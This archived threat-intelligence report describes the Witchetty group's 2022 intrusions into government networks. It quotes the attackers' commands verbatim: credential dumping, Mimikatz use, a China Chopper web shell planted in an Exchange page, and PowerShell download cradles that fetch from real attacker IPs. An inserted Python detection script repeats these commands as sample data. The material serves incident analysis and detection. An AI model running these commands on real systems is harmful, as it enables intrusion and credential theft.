{
	"id": "04c7801a-3b52-48df-9c09-c4267c23f308",
	"created_at": "2026-04-06T00:08:02.65355Z",
	"updated_at": "2026-04-10T03:33:46.11011Z",
	"deleted_at": null,
	"sha1_hash": "f809259eee27f4aaac938b49ed4d729dc53ddfcf",
	"title": "Witchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 57685,
	"plain_text": "Witchetty: Group Uses Updated Toolset in Attacks on\r\nGovernments in Middle East\r\nBy About the Author\r\nArchived: 2026-04-05 12:50:19 UTC\r\nThe Witchetty espionage group (aka LookingFrog) has been progressively updating its toolset, using new malware\r\nin attacks on targets in the Middle East and Africa. Among the new tools being used by the group is a backdoor\r\nTrojan (Backdoor.Stegmap) that employs steganography, a rarely seen technique where malicious code is hidden\r\nwithin an image.\r\nIn attacks between February and September 2022, Witchetty targeted the governments of two Middle Eastern\r\ncountries and the stock exchange of an African nation. The attackers exploited the ProxyShell (CVE-2021-\r\n34473, CVE-2021-34523, and CVE-2021-31207) and ProxyLogon (CVE-2021-26855 and CVE-2021-27065)\r\nvulnerabilities to install web shells on public-facing servers before stealing credentials, moving laterally across\r\nnetworks, and installing malware on other computers.\r\nWho is Witchetty?\r\nWitchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of\r\nTA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity\r\nwas characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage\r\npayload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions,\r\ncharities, and industrial/manufacturing organizations.\r\nNew tooling\r\nWhile the group has continued to use the LookBack backdoor, several new pieces of malware appear to have been\r\nadded to its toolset. One is Backdoor.Stegmap, which leverages steganography to extract its payload from a\r\nbitmap image. 
Although rarely used by attackers, steganography, if successfully executed, can be leveraged to disguise malicious code in seemingly innocuous image files.\r\nA DLL loader downloads a bitmap file from a GitHub repository. The file appears to be simply an old Microsoft Windows logo. However, the payload is hidden within the file and is decrypted with an XOR key.\r\nDisguising the payload in this fashion allowed the attackers to host it on a free, trusted service. Downloads from trusted hosts such as GitHub are far less likely to raise red flags than downloads from an attacker-controlled command-and-control (C\u0026C) server.\r\nThe payload is a fully featured backdoor capable of executing the following commands:\r\nOther new tools used by the attackers include:\r\nCustom proxy utility: This implements a protocol much like SOCKS5, but with the roles reversed: the infected computer acts as the server and connects out to a C\u0026C server acting as the client.\r\nCustom port scanner: Scans the ports of hosts in the subnet, as described in the tool's usage banner.\r\nCustom persistence utility: Adds itself to autostart in the registry as “NVIDIA display core component” (using regsvr32).\r\nWitchetty attack chain\r\nIn one attack against a government agency in the Middle East, the first sign of malicious activity occurred on February 27, 2022, when the attackers exploited the ProxyShell vulnerability to dump the memory of the Local Security Authority Subsystem Service (LSASS) process using the MiniDump export of comsvcs.dll (1036 is the PID of lsass.exe).\r\nrundll32.exe CSIDL_SYSTEM\\comsvcs.dll, MiniDump 1036 CSIDL_PROFILE\\public\\dm.db full\r\nThe next day, the attackers tried to dump the LSASS process using PowerShell on a different Exchange Server, calling MiniDumpWriteDump through reflection with dump type 2 (MiniDumpWithFullMemory) rather than dropping a tool to disk.\r\npowershell -exec bypass $p=Get-Process 
lsass;$f=New-Object IO.FileStream('CSIDL_COMMON_MUSIC\\d',[IO.FileMode]::Create);((([PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')).GetNestedType('NativeMethods','NonPublic')).GetMethod('MiniDumpWriteDump',([Reflection.BindingFlags]'NonPublic,Static'))).Invoke($null,@($p.Handle,$p.Id,$f.SafeFileHandle,([UInt32]2),[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero));$f.Close()\r\nOn March 2, the attackers launched a PowerShell command to obtain a list of Windows Server machines in the victim environment.\r\ncmd.exe\" /c powershell -exec bypass Get-ADComputer -Filter {(OperatingSystem -like \"*windows*server*\") -and (Enabled -eq \"True\")} -Properties OperatingSystem | Sort Name [REDACTED] select -Unique OperatingSystem\"\r\nMalicious activity ceased until March 18, when the attackers returned to the server and used a custom tool that resembled Mimikatz (file name: dd.exe); its arguments suggest it authenticates to a domain controller with an NTLM hash and dumps all account password hashes.\r\ndd.exe -domain:[REDACTED] -dc:MODDC1.[REDACTED] -user:[REDACTED] -ntlm:[REDACTED] -pwdump -all\r\nMalicious activity again ceased for some time. 
On April 26 and 27, the attackers ran commands to find the process identifier (PID) of the LSASS process and attempted to dump it with the technique previously seen, this time writing the dump into the Exchange web root (under aspnet_client, with a .rar extension), from where it could be fetched over HTTP.\r\ncmd /c tasklist | findstr lsass.exe \u003e\u003e CSIDL_WINDOWS\\temp\\8b7db7a3-5376-4d32-8be1-0d3092117022-microsoft.tmp\r\nrundll32 CSIDL_SYSTEM\\comsvcs.dll,minidump 1036 CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\\temp.rar full\r\nNext, on April 29, the attackers dumped the Security Account Manager (SAM) registry hive to the same web directory using the Windows reg.exe tool.\r\nreg save hklm\\sam CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\\sam.hive\r\nBetween May 7 and May 9, the attackers checked the PowerShell execution policy, ran the LookBack backdoor (a DLL invoked through its curl_share_init export), and registered it as a scheduled task on the server.\r\npowershell Get-ExecutionPolicy\r\nrundll32 CSIDL_WINDOWS\\immersivecontrolpanel\\ieupdate.dll, curl_share_init\r\nschtasks /create /tn \"InternetExplorerTaskMachineCore\" /sc daily /st 05:30 /tr \"CSIDL_WINDOWS\\immersivecontrolpanel\\ieupdate.dll\" /ru \"System\" /rl highest\r\nschtasks /run /tn \"InternetExplorerTaskMachineCore\"\r\nBetween June 14 and 18, the attackers used Mimikatz to dump passwords from the LSASS memory. 
They then saved the SAM hive locally and to a remote computer's admin share, launched a PowerShell script named “a.ps1” and a New-Mailbox command through the Exchange Management Shell console file (exshell.psc1, which loads the Exchange cmdlets), and used makecab to compress files on a remote host, likely for exfiltration. Judging by its arguments, the Mimikatz binary was running under the name rundll32.exe.\r\nCSIDL_SYSTEM\\rundll32.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"\r\nreg save HKLM\\SAM s.dat\r\nreg save HKLM\\SAM \\\\[REDACTED]\\C$\\ProgramData\\Microsoft\\Diagnosis\\s.dat\r\npowershell -PSConsoleFile \"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -file a.ps1\r\npowershell -PSConsoleFile \"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\exchange server\\v15\\bin\\exshell.psc1\" -c \"New-Mailbox -Name [REDACTED] -UserPrincipalName [REDACTED] -Password [REDACTED] -String [REDACTED] -AsPlainText -Force)\"\r\nmakecab \\\\[REDACTED]\\c$\\programdata\\microsoft\\drm\\domu.csv \\\\[REDACTED]\\c$\\programdata\\microsoft\\drm\\domu.cab\r\nOn July 3, the attackers created a scheduled task on a remote computer to run the whoami command and save the output to a file. 
They then ran winrm quickconfig to enable the WinRM service and set the WinRM client's TrustedHosts list to *, so that the host could open remote management sessions to any machine in the network without Kerberos or HTTPS host validation.\r\nschtasks /create /s [REDACTED] /u: [REDACTED] /p [REDACTED] /tn \"BACKUPSEC\" /sc onstart /tr cmd.exe /c whoami \u003e c:\\windows\\temp\\1.txt /ru system /f\r\ncscript //nologo CSIDL_SYSTEM\\winrm.vbs quickconfig -q\r\ncscript //nologo CSIDL_SYSTEM\\winrm.vbs s winrm/config/Client @{TrustedHosts=\"*\"}\r\nBetween July 18 and 26, the attackers used the makecab command again to compress files on a remote server. They then used the ProxyLogon exploit to install the China Chopper web shell on this server. Once its \\u escapes are resolved, the echoed JScript page is the classic one-line China Chopper shell eval(Request.Item[\"C00KIE\"],\"unsafe\"), appended with \u003e\u003e to an existing OWA authentication page, flogoff.aspx, so that the shell is served from a legitimate Exchange path.\r\nmakecab \\\\[REDACTED]\\c$\\programdata\\microsoft\\drm\\Server\\0718.ldf \\\\[REDACTED]\\c$\\programdata\\microsoft\\drm\\Server\\0718.cab\r\ncmd /c cd /d \"CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\" \u0026 echo\u003c%@ Page Language=\"Jscript\"%\u003e\u003c%\\u0065\\u0076\\u0061\\u006c(\\u0052\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074.Item[\"\\u0043\\u0030\\u0030\\u004b\\u0049\\u0045\"],\"\\u0075\\u006e\\u0073\\u0061\\u0066\\u0065\");%\u003e \u003e\u003e \"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\exchange server\\v15\\frontend\\httpproxy\\owa\\auth\\15.1.1979\\scripts\\premium\\flogoff.aspx\"\r\nBetween July 20 and 26, the threat actors moved laterally in the network using WMIC and known credentials, attempting to pull files from their C\u0026C servers onto the remote hosts with a PowerShell download cradle.\r\nwmic /node:[REDACTED] /user:[REDACTED] /password:[REDACTED] process call create powershell -exec bypass (new-object net.webclient).downloadstring('http://194.180.174.254/111')\r\nOn July 21, the attackers ran their custom network scanning tool to discover more computers on the network and check for open ports on those machines.\r\np.exe -l [IP_LIST] -p [PORT_LIST] -t 5\r\nOn July 28, the attackers again registered a scheduled task on a remote computer to execute 
the LookBack backdoor daily as the SYSTEM user.\r\ncmd /c cd /d \"CSIDL_WINDOWS\\temp\\temp\" \u0026 schtasks /create /s [REDACTED] /u [REDACTED] /p [REDACTED] /tn \"SystemControlModel\" /sc DAILY /st 4:40 /tr \"cmd.exe \\c rundll32 \\\"CSIDL_SYSTEM_DRIVE\\program Files (x86)\\Internet Explorer\\SystemControlModel.dll\\\" curl_share_init\" /ru system /f\r\nOn August 1, the backdoor executed on the infected computer.\r\nrundll32 CSIDL_PROGRAM_FILES\\internet explorer\\systemcontrolmodel.dll, curl_share_init\r\nOn August 7, a PowerShell script executed which, based on its name, appears to report last-logon information for accounts (the OU in the name suggests it queries an Active Directory organizational unit).\r\nCSIDL_SYSTEM\\windowspowershell\\v1.0\\powershell_ise.exe \"CSIDL_SYSTEM_DRIVE\\report\\getlastloginou.ps1\"\r\nThe last sign of malicious activity occurred on September 1, when the attackers downloaded remote files with a PowerShell download cradle, extracted a 7-Zip archive (deployer.7z) with a renamed 7-Zip binary (7.exe) while referencing a remote host's admin share, executed remote PowerShell scripts via WMIC, and ran the custom proxy tool (repro.exe) to contact the C\u0026C server on port 80.\r\npowershell -exec bypass (new-object net.webclient).downloadstring('http://185.225.19.55:8080/111')\r\n7.exe e deployer.7z \\\\[REDACTED]\\C$\\windows\\temp\\\r\nwmic /node:[REDACTED] /user:[REDACTED] /password:[REDACTED] process call create cmd /c powershell -exec bypass (new-object net.webclient).downloadstring('http://185.225.19.55/111.txt')\r\nrepro.exe 185.225.19.55 80\r\nCapable threat actor\r\nWitchetty has demonstrated the ability to continually refine and refresh its toolset in order to compromise targets of interest. 
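The command lines in the attack chain above are living-off-the-land activity that process-creation telemetry (Sysmon event 1, or Windows 4688 with command-line auditing enabled) records in full. As an added example, not from the Symantec report, the following Python rule set runs over constructed events modelled on those command lines (host names, parent images, the WMIC target address and the credential placeholders are invented) and flags the patterns seen in the chain: LSASS dumps through comsvcs.dll and MiniDumpWriteDump, SAM hive exports, scheduled tasks that run a DLL as SYSTEM, the WinRM TrustedHosts wildcard, the echoed web shell, WMIC download cradles, the curl_share_init export, makecab staging to admin shares, and the web-shell context of an IIS worker spawning a shell.

```python
import ntpath

# Constructed process-creation events, one per line as host|parent image|command line.
# They are modelled on the command lines in the attack chain above; hosts, parent
# images, the WMIC target address and the credential placeholders are invented.
SAMPLE_EVENTS = '''
EXCH01|w3wp.exe|rundll32.exe CSIDL_SYSTEM\\comsvcs.dll, MiniDump 1036 CSIDL_PROFILE\\public\\dm.db full
EXCH02|w3wp.exe|powershell -exec bypass $p=Get-Process lsass;$f=New-Object IO.FileStream('CSIDL_COMMON_MUSIC\\d',[IO.FileMode]::Create);$m=[PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting').GetNestedType('NativeMethods','NonPublic').GetMethod('MiniDumpWriteDump',[Reflection.BindingFlags]'NonPublic,Static');$m.Invoke($null,@($p.Handle,$p.Id,$f.SafeFileHandle,([UInt32]2),[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero));$f.Close()
EXCH01|cmd.exe|reg save hklm\\sam CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\\sam.hive
EXCH01|cmd.exe|schtasks /create /tn \"InternetExplorerTaskMachineCore\" /sc daily /st 05:30 /tr \"CSIDL_WINDOWS\\immersivecontrolpanel\\ieupdate.dll\" /ru \"System\" /rl highest
FS01|cmd.exe|cscript //nologo CSIDL_SYSTEM\\winrm.vbs s winrm/config/Client @{TrustedHosts=\"*\"}
EXCH01|w3wp.exe|cmd /c cd /d \"CSIDL_SYSTEM_DRIVE\\inetpub\\wwwroot\\aspnet_client\" & echo <%@ Page Language=\"Jscript\"%><%\\u0065\\u0076\\u0061\\u006c(\\u0052\\u0065\\u0071\\u0075\\u0065\\u0073\\u0074.Item[\"\\u0043\\u0030\\u0030\\u004b\\u0049\\u0045\"],\"\\u0075\\u006e\\u0073\\u0061\\u0066\\u0065\");%> >> \"CSIDL_SYSTEM_DRIVE\\program files\\microsoft\\exchange server\\v15\\frontend\\httpproxy\\owa\\auth\\15.1.1979\\scripts\\premium\\flogoff.aspx\"
EXCH01|cmd.exe|wmic /node:10.10.20.15 /user:CORP\\svc_backup /password:[REDACTED] process call create powershell -exec bypass (new-object net.webclient).downloadstring('http://194.180.174.254/111')
WS07|svchost.exe|rundll32 CSIDL_PROGRAM_FILES\\internet explorer\\systemcontrolmodel.dll, curl_share_init
WS07|explorer.exe|rundll32.exe CSIDL_SYSTEM\\shell32.dll,Control_RunDLL
EXCH01|cmd.exe|makecab \\\\FS01\\c$\\programdata\\microsoft\\drm\\domu.csv \\\\FS01\\c$\\programdata\\microsoft\\drm\\domu.cab
'''

# Each finding fires when every needle appears in the lowercased command line.
RULES = [
    ('lsass_dump_comsvcs', ('rundll32', 'comsvcs.dll', 'minidump')),
    ('lsass_dump_minidumpwritedump', ('minidumpwritedump', 'lsass')),
    ('sam_hive_export', ('reg save', 'hklm\\sam')),
    ('mimikatz_logonpasswords', ('sekurlsa::logonpasswords',)),
    ('schtask_dll_as_system', ('schtasks', '/create', '.dll', '/ru', 'system')),
    ('winrm_trustedhosts_wildcard', ('winrm', 'trustedhosts', '*')),
    ('webshell_echo_to_aspx', ('echo', '<%', '.aspx')),
    ('wmic_remote_download_cradle', ('wmic', '/node:', 'process call create', 'downloadstring')),
    ('rundll32_curl_share_init', ('rundll32', 'curl_share_init')),
    ('makecab_to_admin_share', ('makecab', 'c$')),
]
WEB_WORKERS = {'w3wp.exe'}      # IIS worker process: where an Exchange web shell executes
LOLBINS = {'cmd', 'powershell', 'rundll32', 'cscript', 'wmic', 'reg', 'schtasks'}


def image_name(cmdline):
    # First token of the command line without directory or .exe suffix.
    tokens = cmdline.split()
    if not tokens:
        return ''
    return ntpath.basename(tokens[0].strip('\"')).lower().removesuffix('.exe')


def findings_for(parent, cmdline):
    low = cmdline.lower()
    hits = [name for name, needles in RULES if all(n in low for n in needles)]
    if parent.lower() in WEB_WORKERS and image_name(cmdline) in LOLBINS:
        hits.append('iis_worker_spawned_lolbin')   # web-shell execution context
    return hits


def parse_events(text):
    for line in text.strip().splitlines():
        host, parent, cmdline = line.split('|', 2)
        yield host, parent, cmdline


def scan(text):
    # Map each host to the sorted list of distinct findings seen on it.
    per_host = {}
    for host, parent, cmdline in parse_events(text):
        for finding in findings_for(parent, cmdline):
            per_host.setdefault(host, set()).add(finding)
    return {host: sorted(found) for host, found in per_host.items()}


def hosts_with_chain(report, minimum=2):
    # Hosts showing two or more distinct techniques (credential dumping plus
    # persistence or lateral movement, say) are the ones to triage first.
    return sorted(host for host, found in report.items() if len(found) >= minimum)


if __name__ == '__main__':
    for host, found in scan(SAMPLE_EVENTS).items():
        print(host, found)
```

Substring matching keeps the example readable; a production rule would key on the parsed image and argument fields and carry exclusions (backup agents also run reg save, and installers create SYSTEM tasks). The per-host combination is the part worth keeping: an Exchange server whose IIS worker spawns a shell and then shows a credential dump plus persistence or lateral movement in the same window is an incident, not a ticket.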
Exploitation of vulnerabilities on public-facing servers provides it with a route into organizations, while custom tools paired with adept use of living-off-the-land tactics allow it to maintain a long-term, persistent presence in targeted organizations.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nIf an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.\r\nSHA256  Description\r\n619b64c6728f9ec27bba7912528a4101a9c835a547db6596fa095b3fe628e128  LookBack backdoor\r\ne597aae95dcaccc5677f78d38cd455fa06b74d271fef44bd514e7413772b5dcb  LookBack backdoor\r\nce3293002a9681736a049301ca5ed6d696d0d46257576929efbb638545ecb78e  LookBack backdoor\r\n73bf59c7f6a28c092a21bf1256db04919084aca5924bbd74277f8bda6191b584  LookBack backdoor\r\nacc52983d5f6b86bec6a81bc3fbe5c195b469def733f7677d681f0e405a1049b  LookBack backdoor\r\nf91e44ff423908b6acf8878dced05dc7188ddab39d1040e0d736f96f0a43518d  LookBack backdoor\r\ne7fcc98005cff9f406a5806222612c20dae3e47c469ff6028310847a599d1a38  LookBack backdoor\r\n104873d692af36173cb39f8b46f2080c8ce1a1a52d60c69e1034e2033ba95f7a  Possible LookBack dropper\r\n3b715112ac93e4cd5eaa7760b5670760fd25d0fec68f6a493624fa23c1c6e042  Backdoor.Stegmap\r\n8030d3472eac3c703ae918600a78a6a89800b157d76f333734ed1af5101d04ed  Custom proxy tool\r\n17e60fc72b5398060138f72b3ecb3b09c37243e3b2905df94b7f5b44d6157806  Custom proxy tool\r\n97ccac64927da6f46b3a775d2feb10c271b676e6b124e5bf84e9722c9dc4f093  Custom port scanner\r\n2d5daaae2fe2e7cd6c47ab4c5f824f670969d3fe88bfd3e4512967378c61924d  Custom persistence tool\r\nd8326470d5631e58409401fbadfc8157ee247c32b368fb4be70c2b8f8f88427e  Keylogger\r\na6cf19ab0dc0f0fb9ed4e6da13925a80d92c326a59131991eaf207d92bc61e13  LSASS credential stealer\r\n348d897e952c0f5872c35ea1b15eab802791b865d3c6ad3a27693680a28056cd  
Korplug/PlugX loader\r\n1c5ad98a27551e6da3502cdc9ecb232f0d1a343b002c1760f350298fee8df202  Plink\r\ndc13f67a5c52488709056f51a63f3fa1056db71616f83cbb5f1f1949395248be  SecretsDump\r\n16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e  FSCAN\r\nd4e2106f9d5294c04ccc02d59882785d548caf4904c8c00446d906bbec2629b2  RAR compressor\r\n31443b7329b1bdbcf0564e68406beabf2a30168fdcb7042bca8fb2998e3f11c5  Mimikatz\r\nc4e9267138cc030e9e87c15c7ff3a15f0a7ece3c39872f354e74842e871e8dc1  Unknown malware\r\n87e507f8fa0f881744afa3a4d5790297bb942230a08134becc150fff511f295b  Unknown malware\r\n59e3bbf97bc08814c56f9aeebaf890a168551d3d9f2ac3efdc8247ecc1732f73  Unknown file\r\n1242d1372ab50a48ad9acec06b4f2a154b072dc494fa392e6647e736135fa636  Corrupted file\r\nf3ae5c2ee98257d0b53d90b62eee18427918af41cb44f8097aa7c3f257c8f7ae  7-Zip file\r\n0b29be26d5caae7cf46eaf9345eea7d9fd7e808b3334e2a2043232d450a648ee  7-Zip file\r\ne27a24e4e99e623566d8a43eb7e562d27c28a7c746d533d36f56312e9a317c2b  7-Zip file\r\n681c22f79e5ec794858172378ed0285ef4da87f4f2dc8545bf304ce1f936529c  China Chopper\r\nbaa5c96ec2c51b601a6808428dbe0dc5e274e2ac65c38c465c5a74a2deb962c6  China Chopper\r\n74b1c46bfda5d2be5c674a6c53c2ad8f4f8d5c5b1cc010f17c6c538e117e013f  China Chopper\r\n5972621204b6503773bfaa58b6aadae073d94c781d89e49557e4d9ecfe4049ab  China Chopper\r\n59bfccc3a6f8e4f737c7b483ec13ba36e53f12af658529a9dd8b0df2b235c0de  China Chopper\r\nd0992dce0769d6ac23076635c902b56daeda17bab5c30f764991c0844141f61f  China Chopper\r\n3859784f390174acc2eeabc82649f7e13f5db592978192b9243c38c254b7e614  China Chopper\r\n1b9e723c70f0a682d4f3a5a7d98a89697b8509a07c8986de041b05806c04d1f9  China Chopper\r\nee5f18e7dcb251a09da9650ac15723b0607282e5befc829d599005a322ac239d  China 
Chopper\r\n78718feee5ee5683827e5068d73922c8cd2cf297fb1818fb2440babb8d589609  China Chopper\r\ne5f98a1b0d37a09260db033aa09d6829dc4788567beccda9b8fef7e6e3764848  Web shell\r\n469ebdd2f6ecdce9558f3e546ef2814c5e1ad274dcd23bf4613964a0c685d889  Batch script\r\n45549618493cf78facbfedba54e662408b7ebaabe3352119974b6500d11edc85  Batch script\r\nd273b4710800ede37617c3b6e3d58e67e45e6b54556dde468d18e48e006a79f2  Script\r\nd66a019a3cec95b6292215cf6fce4c0837f4b1de3c8af232d11ea291c87db698  Script\r\n57e729442e8d6a06857f71538c0c11a5a49ff5d6136c05f20f391ae9eb95c2da  Script\r\na7baecdbbf55825db281a417a9e11cd8d7b8c3ab5679d2474352091b431c6900  Script\r\n1b75fe197f71809dea790f9d1357c0bb5e396f42dfcd4f966c64f5f71b39a865  Script\r\nde5206a50a0ef8c7f00955ffc2f5034c9d588f8736819387be9f2572666aaa4b  Script\r\n084d4a46bb5b6a1ff7dfc2dd7be6f2023d608f5883e345a67fb98ed22188f1bd  Script\r\nNetwork indicators (defanged):\r\n5.252.176[.]3  LookBack C\u0026C server\r\na.bigbluedc[.]com  LookBack C\u0026C server\r\n185.225.19[.]55  Remote IP (Malware)\r\n153.92.1[.]125  Remote IP (Malware)\r\n194.180.174[.]254  Remote IP (Malware)\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
	],
	"report_names": [
		"witchetty-steganography-espionage"
	],
	"threat_actors": [
		{
			"id": "ec14074c-8517-40e1-b4d7-3897f1254487",
			"created_at": "2023-01-06T13:46:38.300905Z",
			"updated_at": "2026-04-10T02:00:02.918468Z",
			"deleted_at": null,
			"main_name": "APT10",
			"aliases": [
				"Red Apollo",
				"HOGFISH",
				"BRONZE RIVERSIDE",
				"G0045",
				"TA429",
				"Purple Typhoon",
				"STONE PANDA",
				"Menupass Team",
				"happyyongzi",
				"CVNX",
				"Cloud Hopper",
				"ATK41",
				"Granite Taurus",
				"POTASSIUM"
			],
			"source_name": "MISPGALAXY:APT10",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3",
			"created_at": "2022-10-25T16:07:23.80111Z",
			"updated_at": "2026-04-10T02:00:04.753677Z",
			"deleted_at": null,
			"main_name": "LookBack",
			"aliases": [
				"FlowingFrog",
				"LookBack",
				"LookingFrog",
				"TA410",
				"Witchetty"
			],
			"source_name": "ETDA:LookBack",
			"tools": [
				"FlowCloud",
				"GUP Proxy Tool",
				"SodomMain",
				"SodomMain RAT",
				"SodomNormal"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9ffcbb0c-7a0f-419f-a174-f18a02ce47f1",
			"created_at": "2023-01-06T13:46:39.059774Z",
			"updated_at": "2026-04-10T02:00:03.199867Z",
			"deleted_at": null,
			"main_name": "TA410",
			"aliases": [],
			"source_name": "MISPGALAXY:TA410",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3e8f802c-efba-45ff-8844-5ea4e4a5297d",
			"created_at": "2023-11-07T02:00:07.092751Z",
			"updated_at": "2026-04-10T02:00:03.404589Z",
			"deleted_at": null,
			"main_name": "Witchetty",
			"aliases": [
				"LookingFrog"
			],
			"source_name": "MISPGALAXY:Witchetty",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ba9fa308-a29a-4928-9c06-73aafec7624c",
			"created_at": "2024-05-01T02:03:07.981061Z",
			"updated_at": "2026-04-10T02:00:03.750803Z",
			"deleted_at": null,
			"main_name": "BRONZE RIVERSIDE",
			"aliases": [
				"APT10 ",
				"CTG-5938 ",
				"CVNX ",
				"Hogfish ",
				"MenuPass ",
				"MirrorFace ",
				"POTASSIUM ",
				"Purple Typhoon ",
				"Red Apollo ",
				"Stone Panda "
			],
			"source_name": "Secureworks:BRONZE RIVERSIDE",
			"tools": [
				"ANEL",
				"AsyncRAT",
				"ChChes",
				"Cobalt Strike",
				"HiddenFace",
				"LODEINFO",
				"PlugX",
				"PoisonIvy",
				"QuasarRAT",
				"QuasarRAT Loader",
				"RedLeaves"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a",
			"created_at": "2022-10-25T15:50:23.298889Z",
			"updated_at": "2026-04-10T02:00:05.316886Z",
			"deleted_at": null,
			"main_name": "menuPass",
			"aliases": [
				"menuPass",
				"POTASSIUM",
				"Stone Panda",
				"APT10",
				"Red Apollo",
				"CVNX",
				"HOGFISH",
				"BRONZE RIVERSIDE"
			],
			"source_name": "MITRE:menuPass",
			"tools": [
				"certutil",
				"FYAnti",
				"UPPERCUT",
				"SNUGRIDE",
				"P8RAT",
				"RedLeaves",
				"SodaMaster",
				"pwdump",
				"Mimikatz",
				"PlugX",
				"PowerSploit",
				"ChChes",
				"cmd",
				"QuasarRAT",
				"AdFind",
				"Cobalt Strike",
				"PoisonIvy",
				"EvilGrab",
				"esentutl",
				"Impacket",
				"Ecipekac",
				"PsExec",
				"HUI Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434082,
	"ts_updated_at": 1775792026,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f809259eee27f4aaac938b49ed4d729dc53ddfcf.pdf",
		"text": "https://archive.orkl.eu/f809259eee27f4aaac938b49ed4d729dc53ddfcf.txt",
		"img": "https://archive.orkl.eu/f809259eee27f4aaac938b49ed4d729dc53ddfcf.jpg"
	}
}